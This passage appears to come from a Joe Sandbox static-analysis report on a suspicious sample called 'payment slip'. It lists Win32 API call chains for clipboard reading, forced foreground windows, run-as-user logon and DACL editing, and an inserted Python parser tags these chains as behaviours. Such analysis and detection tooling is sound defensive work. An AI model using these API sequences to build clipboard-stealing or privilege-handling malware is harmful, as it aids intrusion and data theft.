                                        • SetCapture.USER32(?), ref: 000C994A
                                        • ClientToScreen.USER32(?,?), ref: 000C99AF
                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 000C99BC
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 000C99D6
                                        • ReleaseCapture.USER32 ref: 000C99E1
                                        • GetCursorPos.USER32(?), ref: 000C9A19
                                        • ScreenToClient.USER32(?,?), ref: 000C9A26
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 000C9A80
                                        • SendMessageW.USER32 ref: 000C9AAE
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 000C9AEB
                                        • SendMessageW.USER32 ref: 000C9B1A
                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 000C9B3B
                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 000C9B4A
                                        • GetCursorPos.USER32(?), ref: 000C9B68
                                        • ScreenToClient.USER32(?,?), ref: 000C9B75
                                        • GetParent.USER32(?), ref: 000C9B93
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 000C9BFA
                                        • SendMessageW.USER32 ref: 000C9C2B
                                        • ClientToScreen.USER32(?,?), ref: 000C9C84
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 000C9CB4
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 000C9CDE
                                        • SendMessageW.USER32 ref: 000C9D01
                                        • ClientToScreen.USER32(?,?), ref: 000C9D4E
                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 000C9D82
                                          • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                        • GetWindowLongW.USER32(?,000000F0), ref: 000C9E05
                                        Strings
                                        Similarity
                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                        • String ID: U$@GUI_DRAGID$F
                                        • API String ID: 3429851547-4245882001
                                        • Opcode ID: d7b3a39f89176e71f3bf84fcace8ea57188f6fea81abe2a8b8e9135428002329
                                        • Instruction ID: 4ae8538a34313ba13e026138447850de0aabe5afe67c5335bb0757d0073c06b1
                                        • Opcode Fuzzy Hash: d7b3a39f89176e71f3bf84fcace8ea57188f6fea81abe2a8b8e9135428002329
                                        • Instruction Fuzzy Hash: BA427834208201AFEB25CF28CD88FAEBBE5FF49314F14061DF699976A1D771A960CB51
                                        APIs
                                        • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 000C48F3
                                        • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 000C4908
                                        • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 000C4927
                                        • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 000C494B
                                        • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 000C495C
                                        • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 000C497B
                                        • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 000C49AE
                                        • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 000C49D4
                                        • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 000C4A0F
                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 000C4A56
                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 000C4A7E
                                        • IsMenu.USER32(?), ref: 000C4A97
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000C4AF2
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000C4B20
                                        • GetWindowLongW.USER32(?,000000F0), ref: 000C4B94
                                        • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 000C4BE3
                                        • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 000C4C82
                                        • wsprintfW.USER32 ref: 000C4CAE
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000C4CC9
                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 000C4CF1
                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 000C4D13
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000C4D33
                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 000C4D5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                        • String ID: U$%d/%02d/%02d
                                        • API String ID: 4054740463-1036027768
                                        • Opcode ID: 0e89df77a3d17cb8857b383f42f26cd1bae690c78583f74629c0efb24159026c
                                        • Instruction ID: d5968f93b2617f8765b1ffe18ab7b52741b25716baf2c848df20d66d2f9030e1
                                        • Opcode Fuzzy Hash: 0e89df77a3d17cb8857b383f42f26cd1bae690c78583f74629c0efb24159026c
                                        • Instruction Fuzzy Hash: E212BC71A00215ABFB259F28CC59FAE7BF8FF45710F10412DF51AEA2A1DBB89941CB50
                                        APIs
                                        • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0004F998
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0008F474
                                        • IsIconic.USER32(00000000), ref: 0008F47D
                                        • ShowWindow.USER32(00000000,00000009), ref: 0008F48A
                                        • SetForegroundWindow.USER32(00000000), ref: 0008F494
                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0008F4AA
                                        • GetCurrentThreadId.KERNEL32 ref: 0008F4B1
                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0008F4BD
                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0008F4CE
                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0008F4D6
                                        • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0008F4DE
                                        • SetForegroundWindow.USER32(00000000), ref: 0008F4E1
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0008F4F6
                                        • keybd_event.USER32(00000012,00000000), ref: 0008F501
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0008F50B
                                        • keybd_event.USER32(00000012,00000000), ref: 0008F510
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0008F519
                                        • keybd_event.USER32(00000012,00000000), ref: 0008F51E
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0008F528
                                        • keybd_event.USER32(00000012,00000000), ref: 0008F52D
                                        • SetForegroundWindow.USER32(00000000), ref: 0008F530
                                        • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0008F557
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 4125248594-2988720461
                                        • Opcode ID: c64a61d6ed53b5cb59b1af0da091d7687be234c7091d72f25f83e7518499fab5
                                        • Instruction ID: 6b534552e183d3afa7291f7dba52558037ffc53d3998300a6cda102c13a3ece0
                                        • Opcode Fuzzy Hash: c64a61d6ed53b5cb59b1af0da091d7687be234c7091d72f25f83e7518499fab5
                                        • Instruction Fuzzy Hash: F8314171A40218BBFB206BB59C4AFBF7EACEB44B50F10006AFA05E61D1C6B55D41AB60
                                        APIs
                                          • Part of subcall function 000916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0009170D
                                          • Part of subcall function 000916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0009173A
                                          • Part of subcall function 000916C3: GetLastError.KERNEL32 ref: 0009174A
                                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00091286
                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 000912A8
                                        • CloseHandle.KERNEL32(?), ref: 000912B9
                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 000912D1
                                        • GetProcessWindowStation.USER32 ref: 000912EA
                                        • SetProcessWindowStation.USER32(00000000), ref: 000912F4
                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00091310
                                          • Part of subcall function 000910BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000911FC), ref: 000910D4
                                          • Part of subcall function 000910BF: CloseHandle.KERNEL32(?,?,000911FC), ref: 000910E9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                        • String ID: $default$winsta0
                                        • API String ID: 22674027-1027155976
                                        • Opcode ID: dcb397cfa2f8995fba71d8f4e0923f71d134a1aad081eedc5076b25b861e11f8
                                        • Instruction ID: 50745b41ef0dd2252fa9c0297fcc0c35f53a7f3b80dbeeb373ac516b2de4aaa1
                                        • Opcode Fuzzy Hash: dcb397cfa2f8995fba71d8f4e0923f71d134a1aad081eedc5076b25b861e11f8
                                        • Instruction Fuzzy Hash: 3F81BF71A0020AAFEF219FA4DC49FEE7BF9EF08704F144129FA14B61A1C7758954EB60
                                        APIs
                                          • Part of subcall function 000910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00091114
                                          • Part of subcall function 000910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091120
                                          • Part of subcall function 000910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 0009112F
                                          • Part of subcall function 000910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091136
                                          • Part of subcall function 000910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0009114D
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00090BCC
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00090C00
                                        • GetLengthSid.ADVAPI32(?), ref: 00090C17
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00090C51
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00090C6D
                                        • GetLengthSid.ADVAPI32(?), ref: 00090C84
                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00090C8C
                                        • HeapAlloc.KERNEL32(00000000), ref: 00090C93
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00090CB4
                                        • CopySid.ADVAPI32(00000000), ref: 00090CBB
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00090CEA
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00090D0C
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00090D1E
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090D45
                                        • HeapFree.KERNEL32(00000000), ref: 00090D4C
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090D55
                                        • HeapFree.KERNEL32(00000000), ref: 00090D5C
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090D65
                                        • HeapFree.KERNEL32(00000000), ref: 00090D6C
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00090D78
                                        • HeapFree.KERNEL32(00000000), ref: 00090D7F
                                          • Part of subcall function 00091193: GetProcessHeap.KERNEL32(00000008,00090BB1,?,00000000,?,00090BB1,?), ref: 000911A1
                                          • Part of subcall function 00091193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00090BB1,?), ref: 000911A8
                                          • Part of subcall function 00091193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00090BB1,?), ref: 000911B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                        • String ID:
                                        • API String ID: 4175595110-0
                                        • Opcode ID: d1a753e934f947229b9fe9dac2f8ec98704ec28dab83683a3327bb7f10a2e23c
                                        • Instruction ID: d5dddb060d4178d8218017bdb3e3afc50268151a0e25116ef7be52758d608945
                                        • Opcode Fuzzy Hash: d1a753e934f947229b9fe9dac2f8ec98704ec28dab83683a3327bb7f10a2e23c
                                        • Instruction Fuzzy Hash: 8771697290120AAFEF10DFA5DC48FEEBBBCBF05304F144515F918A6291D775AA05DBA0
                                        APIs
                                        • OpenClipboard.USER32(000CCC08), ref: 000AEB29
                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 000AEB37
                                        • GetClipboardData.USER32(0000000D), ref: 000AEB43
                                        • CloseClipboard.USER32 ref: 000AEB4F
                                        • GlobalLock.KERNEL32(00000000), ref: 000AEB87
                                        • CloseClipboard.USER32 ref: 000AEB91
                                        • GlobalUnlock.KERNEL32(00000000,00000000), ref: 000AEBBC
                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 000AEBC9
                                        • GetClipboardData.USER32(00000001), ref: 000AEBD1
                                        • GlobalLock.KERNEL32(00000000), ref: 000AEBE2
                                        • GlobalUnlock.KERNEL32(00000000,?), ref: 000AEC22
                                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 000AEC38
                                        • GetClipboardData.USER32(0000000F), ref: 000AEC44
                                        • GlobalLock.KERNEL32(00000000), ref: 000AEC55
                                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 000AEC77
                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 000AEC94
                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 000AECD2
                                        • GlobalUnlock.KERNEL32(00000000,?,?), ref: 000AECF3
                                        • CountClipboardFormats.USER32 ref: 000AED14
                                        • CloseClipboard.USER32 ref: 000AED59
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                        • String ID:
                                        • API String ID: 420908878-0
                                        • Opcode ID: 083db630342df3b71b19e90a7d2064ffe46bc82a6f45b7bcbbc8e1cc26cb6247
                                        • Instruction ID: db709fe28f0427819330a27a2f820508e89708a75e9ea304bed440e5a403af04
                                        • Opcode Fuzzy Hash: 083db630342df3b71b19e90a7d2064ffe46bc82a6f45b7bcbbc8e1cc26cb6247
                                        • Instruction Fuzzy Hash: 5D61E034204341AFE311EFA4D888F6AB7E8EF85714F14451DF45A9B2A2CB75DD06CB62
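The function entries above are the API chains behind several of the report's "Contains functionality ..." signatures: the AttachThreadInput / keybd_event(0x12) / SetForegroundWindow sequence that forces a window to the foreground, the LogonUserW / DuplicateTokenEx / OpenWindowStationW("winsta0") / OpenDesktopW("default") sequence used to run a program as another user, the GetUserObjectSecurity / AddAce / SetUserObjectSecurity edit of a window-station or desktop DACL, and the clipboard read that asks for formats 0xD, 0x1 and 0xF. The following is an added example and is not part of the Joe Sandbox report or its tooling: a small Python parser for the `Name.MODULE(args), ref: ADDR` listing format used throughout this page, plus a pattern table (this example's own assumption, not Joe Sandbox's rule set) that maps a function's API set to those behaviours and decodes the Win32 clipboard-format constants and the VK_MENU (0x12, Alt) key code passed to keybd_event. The sample input is copied from the entries above. One caveat for triage: the report rates the sample as a likely compiled AutoIt script, so a match here shows only that the capability is compiled into the binary; whether the embedded script actually exercises it is a question for the behaviour sections of the report, not the static function listing.

```python
"""Classify API-call listings from a Joe Sandbox per-function dump.
Added example, not part of the report or of Joe Sandbox; PATTERNS is this example's own
assumption about which API sets stand behind the report's signatures, not the sandbox's rules."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

API_LINE = re.compile(  # one API line, with or without an argument list or subcall prefix
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Standard Win32 constants.
CLIPBOARD_FORMATS = {1: "CF_TEXT", 2: "CF_BITMAP", 8: "CF_DIB", 13: "CF_UNICODETEXT", 15: "CF_HDROP"}
VK_MENU = 0x12  # Alt; a synthetic Alt press is the usual way to defeat the foreground lock

# Assumed mapping: a block earns a tag when it calls every API in the set.
PATTERNS: Dict[str, Set[str]] = {
    "clipboard_read": {"OpenClipboard", "GetClipboardData", "CloseClipboard"},
    "force_foreground_window": {"AttachThreadInput", "keybd_event", "SetForegroundWindow"},
    "logon_as_other_user": {"LogonUserW", "DuplicateTokenEx", "OpenWindowStationW", "OpenDesktopW"},
    "edit_user_object_dacl": {"GetUserObjectSecurity", "AddAce", "SetSecurityDescriptorDacl",
                              "SetUserObjectSecurity"},
}

@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]  # raw tokens; "?" means the sandbox could not resolve the value
    ref: int               # call-site address
    subcall: bool          # True for "Part of subcall function" lines

def _hex_arg(token: str) -> Optional[int]:
    """Integer value of a hex token; None for "?" and string literals such as winsta0."""
    try:
        return int(token, 16)
    except ValueError:
        return None

def parse_block(text: str) -> List[ApiCall]:
    """Parse the API lines of one function entry; header, hash and dump lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = tuple(m["args"].split(",")) if m["args"] else ()
            calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"] is not None))
    return calls

def classify(calls: List[ApiCall]) -> Set[str]:
    """Tags whose complete API set occurs in the block (subcall lines count)."""
    names = {c.api for c in calls}
    return {tag for tag, needed in PATTERNS.items() if needed <= names}

def clipboard_formats(calls: List[ApiCall]) -> List[str]:
    """Formats requested through GetClipboardData, in call order, without repeats."""
    out: List[str] = []
    for c in calls:
        fmt = _hex_arg(c.args[0]) if c.api == "GetClipboardData" and c.args else None
        if fmt is not None:
            name = CLIPBOARD_FORMATS.get(fmt, "CF_0x%X" % fmt)
            if name not in out:
                out.append(name)
    return out

def synthesizes_alt_key(calls: List[ApiCall]) -> bool:
    """True when keybd_event is called with VK_MENU, i.e. a fake Alt press."""
    return any(c.api == "keybd_event" and c.args and _hex_arg(c.args[0]) == VK_MENU for c in calls)

# Constructed sample input: lines copied from the function entries on this page.
CLIPBOARD_BLOCK = """\
• OpenClipboard.USER32(000CCC08), ref: 000AEB29
• GetClipboardData.USER32(0000000D), ref: 000AEB43
• CloseClipboard.USER32 ref: 000AEB4F
• GetClipboardData.USER32(00000001), ref: 000AEBD1
• GetClipboardData.USER32(0000000F), ref: 000AEC44
• DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 000AEC77
• CloseClipboard.USER32 ref: 000AED59
"""
FOREGROUND_BLOCK = """\
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0008F474
• AttachThreadInput.USER32(?,00000000,00000001), ref: 0008F4CE
• keybd_event.USER32(00000012,00000000), ref: 0008F501
• SetForegroundWindow.USER32(00000000), ref: 0008F530
"""
LOGON_BLOCK = """\
  • Part of subcall function 000916C3: GetLastError.KERNEL32 ref: 0009174A
• LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00091286
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 000912A8
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 000912D1
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00091310
"""

if __name__ == "__main__":
    for block in (CLIPBOARD_BLOCK, FOREGROUND_BLOCK, LOGON_BLOCK):
        calls = parse_block(block)
        print(sorted(classify(calls)), clipboard_formats(calls), synthesizes_alt_key(calls))
```

Paste any other function entry from this page into `parse_block` and the same tags apply; a block that trips `edit_user_object_dacl` together with `logon_as_other_user` in neighbouring functions is the usual shape of a "run as different user" implementation that has to grant the new logon access to the interactive window station and desktop. Matching requires every API in a set, so partial sequences (for example a clipboard read that never calls CloseClipboard) are deliberately not tagged; loosen the table if a sample's listing is truncated.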
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 000A69BE
                                        • FindClose.KERNEL32(00000000), ref: 000A6A12
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000A6A4E
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000A6A75
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 000A6AB2
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 000A6ADF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                        • API String ID: 3830820486-3289030164
                                        • Opcode ID: 61315315ca6645c55b580238e3ee99467f12f59f723d4221eb93a047f09c2da8
                                        • Instruction ID: 1010464e94b6e1f5039746b3603dc656ca9ece743af2d672c2268448d7a2c8a7
                                        • Opcode Fuzzy Hash: 61315315ca6645c55b580238e3ee99467f12f59f723d4221eb93a047f09c2da8
                                        • Instruction Fuzzy Hash: 4ED160B2508300AFC315EBA0C885EABB7ECAF89704F44491DF589D7192EB75DA44CB62
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 000A9663
                                        • GetFileAttributesW.KERNEL32(?), ref: 000A96A1
                                        • SetFileAttributesW.KERNEL32(?,?), ref: 000A96BB
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 000A96D3
                                        • FindClose.KERNEL32(00000000), ref: 000A96DE
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 000A96FA
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000A974A
                                        • SetCurrentDirectoryW.KERNEL32(000F6B7C), ref: 000A9768
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 000A9772
                                        • FindClose.KERNEL32(00000000), ref: 000A977F
                                        • FindClose.KERNEL32(00000000), ref: 000A978F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                        • String ID: *.*
                                        • API String ID: 1409584000-438819550
                                        • Opcode ID: 0868148d1719e4ad8c02befc547ffe6bc64aa01f7a302afa17aa6b3ed00f8398
                                        • Instruction ID: eab9dc92875b6523a15c29596f0574120f6c62b34ac064f479ce50f7c4fa97f0
                                        • Opcode Fuzzy Hash: 0868148d1719e4ad8c02befc547ffe6bc64aa01f7a302afa17aa6b3ed00f8398
                                        • Instruction Fuzzy Hash: A131B3326446196AEB14EFF4EC49EEE77EC9F4A321F104155F919E2090DB34DE848F24
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 000A97BE
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 000A9819
                                        • FindClose.KERNEL32(00000000), ref: 000A9824
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 000A9840
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000A9890
                                        • SetCurrentDirectoryW.KERNEL32(000F6B7C), ref: 000A98AE
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 000A98B8
                                        • FindClose.KERNEL32(00000000), ref: 000A98C5
                                        • FindClose.KERNEL32(00000000), ref: 000A98D5
                                          • Part of subcall function 0009DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0009DB00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                        • String ID: *.*
                                        • API String ID: 2640511053-438819550
                                        • Opcode ID: 6dfd97d26943c1a7fb6fb4f58e001059132458edad261acc6bc2db26627571f6
                                        • Instruction ID: daad73ee5136a16af65d732cf552373528cc7764132f700469d5b2afd078d132
                                        • Opcode Fuzzy Hash: 6dfd97d26943c1a7fb6fb4f58e001059132458edad261acc6bc2db26627571f6
